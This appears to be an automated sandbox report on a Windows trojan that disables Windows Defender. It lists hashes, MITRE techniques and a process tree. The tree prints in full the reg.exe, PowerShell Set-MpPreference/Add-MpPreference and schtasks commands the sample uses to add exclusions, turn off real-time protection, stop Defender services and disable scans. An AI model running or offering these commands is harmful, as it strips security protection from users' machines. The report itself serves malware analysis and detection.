c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
19/03/2024, 02:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
Size

91KB
MD5

607acc5a6b670bd144bf3897cda6b233
SHA1

24a2fc93216adb3543ee555473b2f61f333384d2
SHA256

c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8
SHA512

75bd3c2fe2a6b96586e0e1ecf5d282d55f71fb9891961ca1dd6c6be90eaa9a196fd62c8343abfdb039e384895a593f2a01c725451c580980f238c40d764b4643
SSDEEP

1536:r7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfLx4fmSxL2MO2:nq6+ouCpk2mpcWJ0r+QNTBfLyfmSBR

Score

10^/10

evasion trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/files/0x00070000000231ed-1.dat	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 49 IoCs

pid	Process
1396	powershell.exe
1396	powershell.exe
2632	powershell.exe
2632	powershell.exe
2964	powershell.exe
2964	powershell.exe
2964	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe
2756	powershell.exe
2756	powershell.exe
2756	powershell.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
3192	powershell.exe
3192	powershell.exe
3192	powershell.exe
3936	powershell.exe
3936	powershell.exe
3936	powershell.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe
4336	powershell.exe
4336	powershell.exe
4336	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
4616	powershell.exe
4616	powershell.exe
4616	powershell.exe
4628	powershell.exe
4628	powershell.exe
4628	powershell.exe
2312	powershell.exe
2312	powershell.exe
2312	powershell.exe
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	3936	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3804 wrote to memory of 3944	3804	c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe	91
PID 3804 wrote to memory of 3944	3804	c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe	91
PID 3944 wrote to memory of 1396	3944	cmd.exe	94
PID 3944 wrote to memory of 1396	3944	cmd.exe	94
PID 3944 wrote to memory of 2632	3944	cmd.exe	95
PID 3944 wrote to memory of 2632	3944	cmd.exe	95
PID 3944 wrote to memory of 2964	3944	cmd.exe	97
PID 3944 wrote to memory of 2964	3944	cmd.exe	97
PID 3944 wrote to memory of 2296	3944	cmd.exe	99
PID 3944 wrote to memory of 2296	3944	cmd.exe	99
PID 3944 wrote to memory of 2120	3944	cmd.exe	100
PID 3944 wrote to memory of 2120	3944	cmd.exe	100
PID 3944 wrote to memory of 1376	3944	cmd.exe	101
PID 3944 wrote to memory of 1376	3944	cmd.exe	101
PID 3944 wrote to memory of 2384	3944	cmd.exe	102
PID 3944 wrote to memory of 2384	3944	cmd.exe	102
PID 3944 wrote to memory of 4008	3944	cmd.exe	103
PID 3944 wrote to memory of 4008	3944	cmd.exe	103
PID 3944 wrote to memory of 4844	3944	cmd.exe	131
PID 3944 wrote to memory of 4844	3944	cmd.exe	131
PID 3944 wrote to memory of 3468	3944	cmd.exe	105
PID 3944 wrote to memory of 3468	3944	cmd.exe	105
PID 3944 wrote to memory of 4460	3944	cmd.exe	125
PID 3944 wrote to memory of 4460	3944	cmd.exe	125
PID 3944 wrote to memory of 2840	3944	cmd.exe	107
PID 3944 wrote to memory of 2840	3944	cmd.exe	107
PID 3944 wrote to memory of 4140	3944	cmd.exe	108
PID 3944 wrote to memory of 4140	3944	cmd.exe	108
PID 3944 wrote to memory of 4420	3944	cmd.exe	109
PID 3944 wrote to memory of 4420	3944	cmd.exe	109
PID 3944 wrote to memory of 3244	3944	cmd.exe	110
PID 3944 wrote to memory of 3244	3944	cmd.exe	110
PID 3944 wrote to memory of 4428	3944	cmd.exe	111
PID 3944 wrote to memory of 4428	3944	cmd.exe	111
PID 3944 wrote to memory of 1384	3944	cmd.exe	112
PID 3944 wrote to memory of 1384	3944	cmd.exe	112
PID 3944 wrote to memory of 1300	3944	cmd.exe	113
PID 3944 wrote to memory of 1300	3944	cmd.exe	113
PID 3944 wrote to memory of 4792	3944	cmd.exe	133
PID 3944 wrote to memory of 4792	3944	cmd.exe	133
PID 3944 wrote to memory of 780	3944	cmd.exe	115
PID 3944 wrote to memory of 780	3944	cmd.exe	115
PID 3944 wrote to memory of 1412	3944	cmd.exe	116
PID 3944 wrote to memory of 1412	3944	cmd.exe	116
PID 3944 wrote to memory of 3028	3944	cmd.exe	117
PID 3944 wrote to memory of 3028	3944	cmd.exe	117
PID 3944 wrote to memory of 2664	3944	cmd.exe	137
PID 3944 wrote to memory of 2664	3944	cmd.exe	137
PID 3944 wrote to memory of 1976	3944	cmd.exe	119
PID 3944 wrote to memory of 1976	3944	cmd.exe	119
PID 3944 wrote to memory of 2756	3944	cmd.exe	120
PID 3944 wrote to memory of 2756	3944	cmd.exe	120
PID 3944 wrote to memory of 4568	3944	cmd.exe	121
PID 3944 wrote to memory of 4568	3944	cmd.exe	121
PID 3944 wrote to memory of 5076	3944	cmd.exe	122
PID 3944 wrote to memory of 5076	3944	cmd.exe	122
PID 3944 wrote to memory of 3192	3944	cmd.exe	123
PID 3944 wrote to memory of 3192	3944	cmd.exe	123
PID 3944 wrote to memory of 3936	3944	cmd.exe	124
PID 3944 wrote to memory of 3936	3944	cmd.exe	124
PID 3944 wrote to memory of 4460	3944	cmd.exe	125
PID 3944 wrote to memory of 4460	3944	cmd.exe	125
PID 3944 wrote to memory of 4336	3944	cmd.exe	126
PID 3944 wrote to memory of 4336	3944	cmd.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
"C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3804
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\280A.tmp\280B.tmp\280C.bat C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:1376
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:2384
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:4008
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:4844
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3468
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4460
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2840
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:4140
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:4420
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:3244
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:4428
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1384
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1300
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:4792
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:780
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1412
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:3028
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:2664
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:1976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4844
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:4956
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:3848
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:2508
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:2664
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:4804

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
d7034900aaccbd51366e8a74a1b0cfa6

SHA1
b226c96696a213733393f5570758e96edb1dc4b9

SHA256
dcf2f979d0fae1d9afad3c6d0236b9e0770b4e1496c94a797a8b8ac2189caf0e

SHA512
83f30cfa4196e96b37ea7f77142980d9370a23f6753c3de4b6f3796d41518626f9ae15f17bd08b29ac23ab0efb29579c0a8527dd90056da1644f50d442c3c311

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
083782a87bd50ffc86d70cbc6f04e275

SHA1
0c11bc2b2c2cf33b17fff5e441881131ac1bee31

SHA256
7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f

SHA512
a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c1a54dd5a1ab44cc4c4afd42f291c863

SHA1
b77043ab3582680fc96192e9d333a6be0ae0f69d

SHA256
c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

SHA512
010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6a0370ada998d9026e5fdceabe76feaa

SHA1
e73e90e8707ab28db0243da9573ba0287292412b

SHA256
199155df8d4894cda71e8246ad1b4b416382ebb040d05d459435f00c65c21400

SHA512
a68ec1a2388900f51413f0330ebda41093b47051f0dc6df3cb13b7ef545d5a39585324a133af07202cac38734a035ff426187dc93e44ba4e8ad3ccbcf0b93dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
e0e6aca25e9b3cd891e6856c78ae12da

SHA1
0099c75353e91eaeda6ecf6494cf3bea94d72c74

SHA256
a6756e26db0bd3c3cab380af7a8bfdb09fc207018dfc841fef9ee76f6d5d116a

SHA512
a2cb1c8d4637aa37bce2cf171363bdde4eda25e151617569ba9d4d1941f97309f39d3b1eb8e8ed48bc9ed46f2336b75a44ab18ae3d400ca6c097f4e534d01692

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
3a1e249212d4af8ee7f335a5dfd075ba

SHA1
8ab2019e5d1376124bd79b822b9b1d4a794de076

SHA256
046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa

SHA512
8a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
dcc3133a2a20a294255a82d2b97c61c7

SHA1
53d0acdc354df3f3df9879aaf349cafdd24c12f4

SHA256
cf462864912a95f27b59b1f1818a3e615db55646315dc6fb9742d199345ff207

SHA512
06c50d23012cc6a84c99ba7c98903d6e379eaf6cc87af67580254a938aaf70d91556fb8efe52f0fa097629591023efb8568e85069a9f1c3a3c8bff463247e8c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
721991167161c45d61b03e4dbad4984b

SHA1
fd3fa85d142b5e8d4906d3e5bfe10c5347958457

SHA256
0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

SHA512
f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6abd347108c411d86459aa4a7e462f96

SHA1
5a23bf38d83c038aa3751e1fcbccfcf8c3f2e58f

SHA256
62709dcb58ed81646957df1f217df73542e232c88424fe171dbc76b66f338750

SHA512
6a4f1e7d62a9e47a06b915daf9e1840da1bda9c847d04c276fd756a43e1aa03ebe607bff4e1f2b6e9d79a87da6f670f9bc566a0ebbdaab21db7c4e98b1d518c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
04f1d68afbed6b13399edfae1e9b1472

SHA1
8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

SHA256
f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

SHA512
30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e60eb305a7b2d9907488068b7065abd3

SHA1
1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

SHA256
ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

SHA512
95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\280A.tmp\280B.tmp\280C.bat

Filesize
3KB

MD5
ad8b6610172ff7b78c52f9ca37f38087

SHA1
9e672aa0385998b41de0eaee280af9372f3b299c

SHA256
582e18cb3c8b2c06080cbb7df73ef27128654a4f201476f457a787cae6b068a4

SHA512
2dd57fab8f54736dfe975b7c5c83de1c864e1f3fe498045f566f58da059be311ca8194c6634df447fbcec9382e3b67c70cc9fbc6a29076accdbcc1c0de829658

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iv3aeuga.jfz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1396-17-0x00007FFDB6550000-0x00007FFDB7011000-memory.dmp

Filesize
10.8MB

Download
memory/1396-13-0x000001AC6CE70000-0x000001AC6CE80000-memory.dmp

Filesize
64KB

Download
memory/1396-14-0x000001AC6CE70000-0x000001AC6CE80000-memory.dmp

Filesize
64KB

Download
memory/1396-12-0x00007FFDB6550000-0x00007FFDB7011000-memory.dmp

Filesize
10.8MB

Download
memory/1396-2-0x000001AC6CDF0000-0x000001AC6CE12000-memory.dmp

Filesize
136KB

Download
memory/2120-74-0x000001FF63640000-0x000001FF63650000-memory.dmp

Filesize
64KB

Download
memory/2120-78-0x00007FFDB6550000-0x00007FFDB7011000-memory.dmp

Filesize
10.8MB

Download
memory/2120-73-0x00007FFDB6550000-0x00007FFDB7011000-memory.dmp

Filesize
10.8MB

Download
memory/2120-75-0x000001FF63640000-0x000001FF63650000-memory.dmp

Filesize
64KB

Download
memory/2296-58-0x00007FFDB6550000-0x00007FFDB7011000-memory.dmp

Filesize
10.8MB

Download
memory/2296-63-0x00007FFDB6550000-0x00007FFDB7011000-memory.dmp

Filesize
10.8MB

Download
memory/2296-59-0x000001A257B30000-0x000001A257B40000-memory.dmp

Filesize
64KB

Download
memory/2296-60-0x000001A257B30000-0x000001A257B40000-memory.dmp

Filesize
64KB

Download
memory/2312-241-0x00007FFDB6550000-0x00007FFDB7011000-memory.dmp

Filesize
10.8MB

Download
